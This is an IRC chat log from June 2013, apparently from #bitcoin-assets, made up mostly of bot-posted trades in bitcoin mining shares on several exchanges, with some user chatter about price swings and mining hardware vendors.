[TAT.VIRTUALMINE] 163 @ 0.003565 = 0.5811 BTC [-] Jun 20 01:39:13 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003522 = 0.007 BTC [-] Jun 20 01:39:14 [BTCTC] [TAT.VIRTUALMINE] 1197 @ 0.0035 = 4.1895 BTC [-] Jun 20 01:39:26 yeah! Jun 20 01:39:53 [BTCTC] [TAT.ASICMINER] 25 @ 0.028101 = 0.7025 BTC [+] Jun 20 01:40:43 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jun 20 01:42:29 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.003655 = 0.1097 BTC [+] Jun 20 01:42:31 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003651 = 0.1826 BTC [-] Jun 20 01:42:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00365 BTC [-] Jun 20 01:42:35 [BTCTC] [TAT.VIRTUALMINE] 431 @ 0.0035 = 1.5085 BTC [-] Jun 20 01:42:48 [BTCTC] [TAT.ASICMINER] 34 @ 0.0281 = 0.9554 BTC [-] Jun 20 01:42:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.028002 BTC [-] Jun 20 01:42:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.028 = 0.084 BTC [-] Jun 20 01:42:53 [BTCTC] [TAT.ASICMINER] 11 @ 0.028 = 0.308 BTC [-] Jun 20 01:42:55 [HAVELOCK] [ASICM] 49 @ 0.028399 = 1.3916 BTC [+] Jun 20 01:43:11 [BTCTC] [BASIC-MINING] 2 @ 0.75 = 1.5 BTC [+] Jun 20 01:43:53 [HAVELOCK] [ASICM] 25 @ 0.028399 = 0.71 BTC [+] Jun 20 01:44:02 [MPEX] [S.MPOE] 2649 @ 0.00067998 = 1.8013 BTC [+] Jun 20 01:44:03 [MPEX] [S.MPOE] 2351 @ 0.00068072 = 1.6004 BTC [+] Jun 20 01:44:07 [BTCTC] [TAT.VIRTUALMINE] 372 @ 0.0035 = 1.302 BTC [-] Jun 20 01:44:08 [BTCTC] [TAT.VIRTUALMINE] 475 @ 0.0035 = 1.6625 BTC [-] Jun 20 01:44:10 [HAVELOCK] [ASICM] 4 @ 0.02830001 = 0.1132 BTC [-] Jun 20 01:44:11 [HAVELOCK] [ASICM] 92 @ 0.02815001 = 2.5898 BTC [-] Jun 20 01:44:15 [BTCTC] [BASIC-MINING] 2 @ 0.75 = 1.5 BTC [+] Jun 20 01:44:35 [BTCTC] [BASIC-MINING] 44 @ 0.75 = 33 BTC [+] Jun 20 01:45:12 [HAVELOCK] [ASICM] 2 @ 0.028399 = 0.0568 BTC [+] Jun 20 01:48:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00351 BTC [+] Jun 20 01:48:29 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.0035 = 0.042 BTC [-] Jun 20 01:49:09 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.00351 = 0.0421 BTC [+] Jun 20 01:49:12 [BTCTC] [TAT.VIRTUALMINE] 147 @ 0.0035 = 0.5145 BTC [-] Jun 20 01:49:44 [BTCTC] [TAT.VIRTUALMINE] 366 @ 0.0035 = 1.281 BTC [-] Jun 20 01:50:03 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004 = 0.008 BTC [+] Jun 20 01:50:21 Bat shitt crazy market Jun 20 01:50:38 [BTCTC] [ASICMINER-PT] 2 @ 2.82899 = 5.658 BTC [-] Jun 20 01:51:06 [BTCTC] [ASICMINER-PT] 1 @ 2.828999 BTC [+] Jun 20 01:52:19 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 20 01:52:43 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 20 01:53:05 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0035 = 0.035 BTC [-] Jun 20 01:53:36 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0035 = 0.0105 BTC [-] Jun 20 01:54:01 [BTCTC] [TAT.VIRTUALMINE] 327 @ 0.0035 = 1.1445 BTC [-] Jun 20 01:54:59 [BTCTC] [TAT.ASICMINER] 24 @ 0.028 = 0.672 BTC [-] Jun 20 01:55:01 [BTCTC] [TAT.ASICMINER] 10 @ 0.028 = 0.28 BTC [-] Jun 20 01:56:48 [BTCTC] [BASIC-MINING] 7 @ 0.76 = 5.32 BTC [+] Jun 20 02:06:40 [MPEX] [S.MPOE] 2749 @ 0.00068072 = 1.8713 BTC [+] Jun 20 02:06:42 [MPEX] [S.MPOE] 9800 @ 0.00068094 = 6.6732 BTC [+] Jun 20 02:06:53 [MPEX] [S.MPOE] 2301 @ 0.00068141 = 1.5679 BTC [+] Jun 20 02:07:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.028 = 0.14 BTC [-] Jun 20 02:07:36 hm, does anyone think that the tat.vm price will recover? Jun 20 02:09:56 I do. It may have dropped after I announced my asset and DMS.Mining took a hit from doubled exposure and the huge DMS.Selling dividend. However, my asset won't mine for at least several weeks and DMS.Mining will recover if the difficulty stays low. Jun 20 02:10:37 [HAVELOCK] [ASICM] 1 @ 0.028399 BTC [+] Jun 20 02:10:54 In fact, I'd buy TAT.VM now if I had spare cash, but whatever you do, don't listen to me, I'm not qualified to give financial advice. Jun 20 02:11:24 lol Jun 20 02:11:36 your asset had nothing to do with it, surely Jun 20 02:11:47 sure I know, just wanted to listen to other opinions as the price is crashing right now Jun 20 02:12:25 [HAVELOCK] [ASICM] 5 @ 0.028399 = 0.142 BTC [+] Jun 20 02:12:40 [HAVELOCK] [ASICM] 1 @ 0.028399 BTC [+] Jun 20 02:13:06 By MetaBank: Congratulations to all who have left for pre-order! According to the current state confirm that we are on time and the device will be delivered on time. Jun 20 02:13:44 From Google translate of https://bitcointalk.org/index.php?topic=183368.msg2523947#msg2523947 Jun 20 02:15:05 'On time' is either August (which was their initial claim) or October (which is what the contract states), so don't get yer hopes up yet. Jun 20 02:15:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00465 BTC [+] Jun 20 02:15:18 [BTCTC] [BASIC-MINING] 13 @ 0.76 = 9.88 BTC [+] Jun 20 02:15:28 [BTCTC] [DMS.SELLING] 30 @ 0.03475 = 1.0425 BTC [+] Jun 20 02:17:43 [HAVELOCK] [ASICM] 45 @ 0.028399 = 1.278 BTC [+] Jun 20 02:20:58 [BTCTC] [ASICMINER-PT] 1 @ 2.75 BTC [-] Jun 20 02:24:23 [BTCTC] [CRYPTO-TRADE] 25 @ 0.199997 = 4.9999 BTC [+] Jun 20 02:26:40 [BTCTC] [BASIC-MINING] 3 @ 0.76 = 2.28 BTC [+] Jun 20 02:27:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.02788 = 0.1394 BTC [-] Jun 20 02:28:29 [MPEX] [S.MPOE] 801 @ 0.00067703 = 0.5423 BTC [-] Jun 20 02:28:31 [MPEX] [S.MPOE] 13530 @ 0.00067606 = 9.1471 BTC [-] Jun 20 02:28:33 [MPEX] [S.MPOE] 11050 @ 0.0006758 = 7.4676 BTC [-] Jun 20 02:28:43 [MPEX] [S.MPOE] 19303 @ 0.00067564 = 13.0419 BTC [-] Jun 20 02:29:42 [BTCTC] [DMS.MINING] 2 @ 0.019397 = 0.0388 BTC [+] Jun 20 02:30:11 [BTCTC] [DMS.MINING] 74 @ 0.0194 = 1.4356 BTC [+] Jun 20 02:30:55 [HAVELOCK] [ASICM] 8 @ 0.02839899 = 0.2272 BTC [-] Jun 20 02:31:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.028 BTC [+] Jun 20 02:33:31 [BTCTC] [DMS.SELLING] 10 @ 0.035 = 0.35 BTC [+] Jun 20 02:35:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.027802 BTC [-] Jun 20 02:38:30 [BTCTC] [CRYPTO-TRADE] 17 @ 0.199997 = 3.3999 BTC [+] Jun 20 02:38:45 [HAVELOCK] [ASICM] 19 @ 0.028399 = 0.5396 BTC [+] Jun 20 02:39:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.027801 BTC [-] Jun 20 02:40:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.027801 BTC [-] Jun 20 02:42:01 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [+] Jun 20 02:43:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.027401 = 0.137 BTC [-] Jun 20 02:43:46 [BTCTC] [DMS.MINING] 26 @ 0.0194 = 0.5044 BTC [+] Jun 20 02:43:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.027294 = 0.1365 BTC [-] Jun 20 02:45:21 ;;seen mircea_popescu Jun 20 02:45:21 mircea_popescu was last seen in #bitcoin-assets 10 hours, 50 minutes, and 34 seconds ago: http://science.slashdot.org/story/13/06/17/134237/canadian-couple-charged-5k-for-finding-400-year-old-skeleton Jun 20 02:46:05 rip mircea :( Jun 20 02:46:18 Lol Jun 20 02:46:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.027294 = 0.0546 BTC [-] Jun 20 02:46:23 Probably hard at work on S.MG Jun 20 02:46:27 huge endeavor Jun 20 02:46:32 even bigger than MPOE in my opinion Jun 20 02:46:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.027295 = 0.0546 BTC [+] Jun 20 02:47:06 [BTCTC] [DMS.SELLING] 20 @ 0.035746 = 0.7149 BTC [+] Jun 20 02:47:13 [BTCTC] [DMS.SELLING] 2 @ 0.035747 = 0.0715 BTC [+] Jun 20 02:49:46 i'm curious how it ends up. nerds are used to be treated like scum, artists not very much Jun 20 02:50:02 [HAVELOCK] [ASICM] 3 @ 0.028399 = 0.0852 BTC [+] Jun 20 02:50:32 [BTCTC] [TAT.ASICMINER] 46 @ 0.027295 = 1.2556 BTC [+] Jun 20 02:50:45 i know grpahic designers are a largely miserable lot Jun 20 02:50:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00464 BTC [-] Jun 20 02:50:58 [BTCTC] [BASIC-MINING] 8 @ 0.76 = 6.08 BTC [+] Jun 20 02:50:59 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [+] Jun 20 02:51:10 dunno about pixel artists and 3D gfx peeps Jun 20 02:51:20 AM Average Hashrate for the last 12 hours: 42.3TH Jun 20 02:53:03 [BTCTC] [BASIC-MINING] 3 @ 0.76 = 2.28 BTC [+] Jun 20 02:53:33 [BTCTC] [TAT.ASICMINER] 24 @ 0.027294 = 0.6551 BTC [-] Jun 20 02:55:58 [BTCTC] [BASIC-MINING] 5 @ 0.76 = 3.8 BTC [+] Jun 20 02:56:00 ;;ticker Jun 20 02:56:01 BTCUSD ticker | Best bid: 108.24100, Best ask: 108.24104, Bid-ask spread: 0.00004, Last trade: 108.24105, 24 hour volume: 17419.02795540, 24 hour low: 104.66030, 24 hour high: 110.98630, 24 hour vwap: 107.87033 Jun 20 02:56:08 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.004499 = 0.225 BTC [-] Jun 20 02:56:15 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0045 = 0.0225 BTC [+] Jun 20 02:56:26 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00464 = 0.0232 BTC [+] Jun 20 02:56:34 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.00465 = 0.0698 BTC [+] Jun 20 02:56:38 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.005 = 0.025 BTC [+] Jun 20 02:56:41 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.00545 = 0.0818 BTC [+] Jun 20 02:57:41 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0047 = 0.0235 BTC [-] Jun 20 02:57:47 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00598 = 0.012 BTC [+] Jun 20 02:57:55 [BTCTC] [TAT.VIRTUALMINE] 64 @ 0.00598 = 0.3827 BTC [+] Jun 20 02:58:01 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.005987 = 0.0599 BTC [+] Jun 20 02:58:08 [BTCTC] [TAT.VIRTUALMINE] 139 @ 0.005994 = 0.8332 BTC [+] Jun 20 02:58:13 [BTCTC] [TAT.VIRTUALMINE] 156 @ 0.005995 = 0.9352 BTC [+] Jun 20 02:58:18 [BTCTC] [TAT.VIRTUALMINE] 67 @ 0.005999 = 0.4019 BTC [+] Jun 20 02:58:27 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.006 = 0.6 BTC [+] Jun 20 02:58:31 i guess it recovered Jun 20 02:58:33 [BTCTC] [BTC-TRADING-PT] 1 @ 0.3888 BTC [-] Jun 20 02:58:38 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.006 = 0.072 BTC [+] Jun 20 02:58:42 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.006 = 0.024 BTC [+] Jun 20 02:58:49 [BTCTC] [TAT.VIRTUALMINE] 81 @ 0.006 = 0.486 BTC [+] Jun 20 02:58:53 [BTCTC] [TAT.VIRTUALMINE] 123 @ 0.006 = 0.738 BTC [+] Jun 20 02:58:58 [BTCTC] [TAT.VIRTUALMINE] 131 @ 0.006 = 0.786 BTC [+] Jun 20 03:00:34 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.006 = 0.06 BTC [+] Jun 20 03:00:41 [BTCTC] [TAT.VIRTUALMINE] 24 @ 0.006196 = 0.1487 BTC [+] Jun 20 03:00:45 jurov: can you elaborate a little bit? Jun 20 03:00:57 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.006299 = 0.5669 BTC [+] Jun 20 03:02:23 [HAVELOCK] [ASICM] 2 @ 0.028399 = 0.0568 BTC [+] Jun 20 03:02:24 thestringpuller: how elaborate? Jun 20 03:02:49 [BTCTC] [DMS.SELLING] 15 @ 0.03575 = 0.5363 BTC [+] Jun 20 03:03:29 [BTCTC] [RSM] 2 @ 0.019 = 0.038 BTC [+] Jun 20 03:07:13 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.006297 = 0.0441 BTC [-] Jun 20 03:08:06 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [-] Jun 20 03:09:52 [BTCTC] [BASIC-MINING] 4 @ 0.76 = 3.04 BTC [+] Jun 20 03:10:31 [BTCTC] [ASICMINER-PT] 1 @ 2.720001 BTC [+] Jun 20 03:10:54 Why do you think Popescu is going to abuse his artists? Jun 20 03:11:33 [BTCTC] [BASIC-MINING] 3 @ 0.76 = 2.28 BTC [+] Jun 20 03:12:59 [HAVELOCK] [ASICM] 22 @ 0.02839899 = 0.6248 BTC [-] Jun 20 03:14:43 [17:10] In fact, I'd buy TAT.VM now if I had spare cash, but whatever you do, don't listen to me, I'm not qualified to give financial advice. Jun 20 03:15:12 [16:54] <@assbot> [BTCTC] [TAT.VIRTUALMINE] 327 @ 0.0035 = 1.1445 BTC [-] Jun 20 03:15:26 [18:07] <@assbot> [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.006297 = 0.0441 BTC [-] Jun 20 03:15:32 Like I said, don't listen to me. Jun 20 03:16:49 [BTCTC] [BTC-TRADING-PT] 1 @ 0.3888 BTC [-] Jun 20 03:16:50 [BTCTC] [DMS.MINING] 74 @ 0.0194 = 1.4356 BTC [+] Jun 20 03:17:01 [MPEX] [S.MPOE] 17950 @ 0.00067518 = 12.1195 BTC [-] Jun 20 03:17:02 [MPEX] [S.MPOE] 3750 @ 0.00067495 = 2.5311 BTC [-] Jun 20 03:17:04 [BTCTC] [DMS.PURCHASE] 42 @ 0.054499 = 2.289 BTC [-] Jun 20 03:21:25 [BTCTC] [TAT.ASICMINER] 39 @ 0.027799 = 1.0842 BTC [+] Jun 20 03:21:30 [BTCTC] [BASIC-MINING] 3 @ 0.76 = 2.28 BTC [+] Jun 20 03:21:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.02728 BTC [-] Jun 20 03:22:12 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.006298 = 0.3149 BTC [+] Jun 20 03:22:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.027279 BTC [-] Jun 20 03:22:57 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.006298 = 0.0189 BTC [+] Jun 20 03:23:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0271 BTC [-] Jun 20 03:23:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.0271 = 0.0813 BTC [-] Jun 20 03:23:20 [BTCTC] [BASIC-MINING] 1 @ 0.76 BTC [+] Jun 20 03:25:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.027799 = 0.0556 BTC [+] Jun 20 03:27:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.027799 = 0.0556 BTC [+] Jun 20 03:27:38 [BTCTC] [TAT.ASICMINER] 7 @ 0.027799 = 0.1946 BTC [+] Jun 20 03:28:15 [BTCTC] [TAT.ASICMINER] 18 @ 0.027799 = 0.5004 BTC [+] Jun 20 03:28:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.027101 = 0.0542 BTC [-] Jun 20 03:28:31 [BTCTC] [TAT.ASICMINER] 17 @ 0.0271 = 0.4607 BTC [-] Jun 20 03:28:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.027001 = 0.162 BTC [-] Jun 20 03:28:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Jun 20 03:28:56 [BTCTC] [TAT.ASICMINER] 59 @ 0.027 = 1.593 BTC [-] Jun 20 03:29:10 [BTCTC] [ASICMINER-PT] 1 @ 2.72001 BTC [+] Jun 20 03:29:16 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [-] Jun 20 03:29:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.0278 = 0.139 BTC [+] Jun 20 03:29:23 [BTCTC] [ASICMINER-PT] 1 @ 2.71 BTC [-] Jun 20 03:29:27 [BTCTC] [ASICMINER-PT] 1 @ 2.71 BTC [-] Jun 20 03:29:35 [BTCTC] [ASICMINER-PT] 1 @ 2.7012 BTC [-] Jun 20 03:29:38 [BTCTC] [ASICMINER-PT] 3 @ 2.70111 = 8.1033 BTC [-] Jun 20 03:29:43 [BTCTC] [ASICMINER-PT] 2 @ 2.7011 = 5.4022 BTC [-] Jun 20 03:30:13 [BTCTC] [ASICMINER-PT] 35 @ 2.70002 = 94.5007 BTC [-] Jun 20 03:34:12 [BTCTC] [DMS.MINING] 10 @ 0.020175 = 0.2018 BTC [+] Jun 20 03:34:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006299 BTC [+] Jun 20 03:35:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.027799 = 0.0556 BTC [-] Jun 20 03:35:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.0278 = 0.0556 BTC [+] Jun 20 03:36:07 [BTCTC] [COG.F] 3 @ 2.501 = 7.503 BTC [+] Jun 20 03:36:12 [BTCTC] [COG.F] 1 @ 2.5 BTC [-] Jun 20 03:37:50 [BTCTC] [COGNITIVE] 1 @ 0.275101 BTC [-] Jun 20 03:37:57 [BTCTC] [COGNITIVE] 2 @ 0.2751 = 0.5502 BTC [-] Jun 20 03:38:06 [BTCTC] [COGNITIVE] 2 @ 0.275 = 0.55 BTC [-] Jun 20 03:38:15 [BTCTC] [COGNITIVE] 1 @ 0.27 BTC [-] Jun 20 03:38:20 [BTCTC] [COGNITIVE] 1 @ 0.255012 BTC [-] Jun 20 03:38:25 [BTCTC] [COGNITIVE] 10 @ 0.255 = 2.55 BTC [-] Jun 20 03:38:32 [BTCTC] [COGNITIVE] 3 @ 0.25 = 0.75 BTC [-] Jun 20 03:38:59 Cog is getting raped by BFL. Explicitly targeted for calling BFL unethical. Jun 20 03:38:59 [BTCTC] [ASICMINER-PT] 1 @ 2.71 BTC [+] Jun 20 03:39:20 https://bitcointalk.org/index.php?topic=236794.msg2517566#msg2517566 Jun 20 03:39:24 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Jun 20 03:39:25 also caught fluffing his own auction(s) Jun 20 03:39:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.027799 BTC [-] Jun 20 03:39:44 Yeah... Jun 20 03:39:50 furuknap read until the end Jun 20 03:39:52 you are missing otu Jun 20 03:39:53 out Jun 20 03:40:38 In the process now; I did get some whiffs aleardy, though :-) Jun 20 03:42:54 [BTCTC] [BASIC-MINING] 10 @ 0.769999 = 7.7 BTC [+] Jun 20 03:42:59 [BTCTC] [BASIC-MINING] 1 @ 0.77 BTC [+] Jun 20 03:43:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006298 BTC [-] Jun 20 03:43:40 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.006299 = 0.0504 BTC [+] Jun 20 03:43:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.027799 = 0.0834 BTC [-] Jun 20 03:43:58 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Jun 20 03:44:04 [BTCTC] [ASICMINER-PT] 11 @ 2.69 = 29.59 BTC [-] Jun 20 03:44:41 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006299 BTC [+] Jun 20 03:45:04 [BTCTC] [ASICMINER-PT] 2 @ 2.75 = 5.5 BTC [+] Jun 20 03:45:24 [BTCTC] [ASICMINER-PT] 1 @ 2.680003 BTC [-] Jun 20 03:45:31 [BTCTC] [ASICMINER-PT] 2 @ 2.67611 = 5.3522 BTC [-] Jun 20 03:45:41 [BTCTC] [S.DICE-PT] 24 @ 0.002669 = 0.0641 BTC [+] Jun 20 03:45:55 [BTCTC] [ASICMINER-PT] 1 @ 2.675 BTC [-] Jun 20 03:47:17 [BTCTC] [DMS.SELLING] 10 @ 0.035715 = 0.3572 BTC [-] Jun 20 03:47:26 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0065 = 0.0325 BTC [+] Jun 20 03:49:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.027799 = 0.0834 BTC [-] Jun 20 03:53:43 [BTCTC] [DMS.SELLING] 22 @ 0.03575 = 0.7865 BTC [+] Jun 20 03:53:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.027798 BTC [-] Jun 20 03:53:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.027799 = 0.0834 BTC [+] Jun 20 03:54:24 [BTCTC] [DMS.PURCHASE] 23 @ 0.054499 = 1.2535 BTC [-] Jun 20 03:54:58 [HAVELOCK] [ASICM] 1 @ 0.02815002 BTC [-] Jun 20 03:54:59 [HAVELOCK] [ASICM] 8 @ 0.02815002 = 0.2252 BTC [-] Jun 20 03:55:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.027799 = 0.278 BTC [+] Jun 20 03:58:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.027799 = 0.1668 BTC [+] Jun 20 03:58:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.027799 = 0.0834 BTC [+] Jun 20 04:00:51 [BTCTC] [TAT.ASICMINER] 6 @ 0.027799 = 0.1668 BTC [+] Jun 20 04:01:13 [HAVELOCK] [ASICM] 1 @ 0.02815002 BTC [-] Jun 20 04:01:31 [BTCTC] [ASICMINER-PT] 1 @ 2.79 BTC [+] Jun 20 04:01:44 [BTCTC] [DMS.PURCHASE] 25 @ 0.054499 = 1.3625 BTC [-] Jun 20 04:01:52 [BTCTC] [DMS.SELLING] 7 @ 0.03571 = 0.25 BTC [-] Jun 20 04:02:38 [BTCTC] [BASIC-MINING] 1 @ 0.77 BTC [+] Jun 20 04:04:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0049 BTC [-] Jun 20 04:05:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.027799 = 0.1668 BTC [+] Jun 20 04:05:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.027799 = 0.0834 BTC [+] Jun 20 04:06:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.0278 = 0.2224 BTC [+] Jun 20 04:07:41 [BTCTC] [BASIC-MINING] 1 @ 0.77 BTC [+] Jun 20 04:08:15 [HAVELOCK] [ASICM] 1 @ 0.02815 BTC [-] Jun 20 04:09:15 [BTCTC] [BASIC-MINING] 1 @ 0.77 BTC [+] Jun 20 04:09:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.0278 = 0.1112 BTC [+] Jun 20 04:10:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.028 = 0.112 BTC [+] Jun 20 04:10:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.028 = 0.28 BTC [+] Jun 20 04:10:10 [BTCTC] [TAT.ASICMINER] 6 @ 0.028 = 0.168 BTC [+] Jun 20 04:10:19 [BTCTC] [BASIC-MINING] 1 @ 0.77 BTC [+] Jun 20 04:11:26 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00452 BTC [-] Jun 20 04:11:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.028 BTC [+] Jun 20 04:11:57 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004511 = 0.0451 BTC [-] Jun 20 04:12:34 [HAVELOCK] [ASICM] 5 @ 0.02815 = 0.1408 BTC [-] Jun 20 04:13:02 [BTCTC] [PAJKA.BOND] 2 @ 0.059999 = 0.12 BTC [-] Jun 20 04:14:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.0278 = 0.0556 BTC [-] Jun 20 04:14:10 [BTCTC] [TAT.ASICMINER] 6 @ 0.027799 = 0.1668 BTC [-] Jun 20 04:14:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.028 BTC [+] Jun 20 04:14:29 [BTCTC] [BASIC-MINING] 1 @ 0.77 BTC [+] Jun 20 04:14:58 [HAVELOCK] [ASICM] 1 @ 0.02838899 BTC [+] Jun 20 04:16:44 [BTCTC] [TAT.ASICMINER] 8 @ 0.028 = 0.224 BTC [+] Jun 20 04:19:14 [BTCTC] [PAJKA.BOND] 5 @ 0.059999 = 0.3 BTC [-] Jun 20 04:20:48 [BTCTC] [PAJKA.BOND] 5 @ 0.06 = 0.3 BTC [+] Jun 20 04:21:16 [BTCTC] [TAT.ASICMINER] 14 @ 0.028 = 0.392 BTC [+] Jun 20 04:23:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.028 = 0.112 BTC [+] Jun 20 04:25:59 [BTCTC] [ASICMINER-PT] 1 @ 2.79 BTC [+] Jun 20 04:26:38 [BTCTC] [B.YABMC] 1 @ 0.01199 BTC [-] Jun 20 04:27:19 [BTCTC] [B.YABMC] 9 @ 0.012 = 0.108 BTC [+] Jun 20 04:28:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.028 = 0.084 BTC [+] Jun 20 04:29:34 [BTCTC] [BASIC-MINING] 3 @ 0.77 = 2.31 BTC [+] Jun 20 04:30:17 [BTCTC] [DMS.MINING] 1 @ 0.01711 BTC [-] Jun 20 04:30:47 [BTCTC] [DMS.MINING] 4 @ 0.01711 = 0.0684 BTC [-] Jun 20 04:31:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.028 = 0.168 BTC [+] Jun 20 04:31:47 [BTCTC] [TAT.ASICMINER] 50 @ 0.0273 = 1.365 BTC [-] Jun 20 04:31:49 [BTCTC] [TAT.ASICMINER] 34 @ 0.027256 = 0.9267 BTC [-] Jun 20 04:32:19 [HAVELOCK] [ASICM] 1 @ 0.02811002 BTC [-] Jun 20 04:32:20 [HAVELOCK] [ASICM] 89 @ 0.02811001 = 2.5018 BTC [-] Jun 20 04:32:22 [BTCTC] [ASICMINER-PT] 1 @ 2.791 BTC [+] Jun 20 04:37:07 [BTCTC] [TAT.ASICMINER] 17 @ 0.028 = 0.476 BTC [+] Jun 20 04:39:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.028 = 0.14 BTC [+] Jun 20 04:40:02 [BTCTC] [BASIC-MINING] 3 @ 0.77 = 2.31 BTC [+] Jun 20 04:41:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.028 = 0.28 BTC [+] Jun 20 04:42:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.028 = 0.056 BTC [+] Jun 20 04:43:38 [BTCTC] [BASIC-MINING] 10 @ 0.77 = 7.7 BTC [+] Jun 20 04:47:14 [BTCTC] [DMS.SELLING] 35 @ 0.03571 = 1.2499 BTC [-] Jun 20 04:48:34 [HAVELOCK] [ASICM] 8 @ 0.02837 = 0.227 BTC [+] Jun 20 04:49:18 [BTCTC] [DMS.PURCHASE] 22 @ 0.054499 = 1.199 BTC [-] Jun 20 04:49:24 [BTCTC] [ASICMINER-PT] 1 @ 2.7899 BTC [-] Jun 20 04:49:26 [BTCTC] [ASICMINER-PT] 1 @ 2.796 BTC [+] Jun 20 04:49:27 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [+] Jun 20 04:49:29 [BTCTC] [ASICMINER-PT] 1 @ 2.81 BTC [+] Jun 20 04:49:32 [BTCTC] [ASICMINER-PT] 1 @ 2.8198 BTC [+] Jun 20 04:49:34 [BTCTC] [ASICMINER-PT] 3 @ 2.8199 = 8.4597 BTC [+] **** ENDING LOGGING AT Thu Jun 20 04:51:12 2013 **** BEGIN LOGGING AT Thu Jun 20 04:51:35 2013 Jun 20 04:52:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.028 = 0.084 BTC [+] Jun 20 04:52:39 [BTCTC] [TAT.ASICMINER] 4 @ 0.0285 = 0.114 BTC [+] Jun 20 04:53:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.0287 = 0.287 BTC [+] Jun 20 04:54:26 [BTCTC] [TAT.ASICMINER] 43 @ 0.0287 = 1.2341 BTC [+] Jun 20 04:55:11 [BTCTC] [TAT.ASICMINER] 7 @ 0.0287 = 0.2009 BTC [+] Jun 20 04:55:34 [BTCTC] [DMS.PURCHASE] 1 @ 0.054499 BTC [-] Jun 20 04:57:33 [BTCTC] 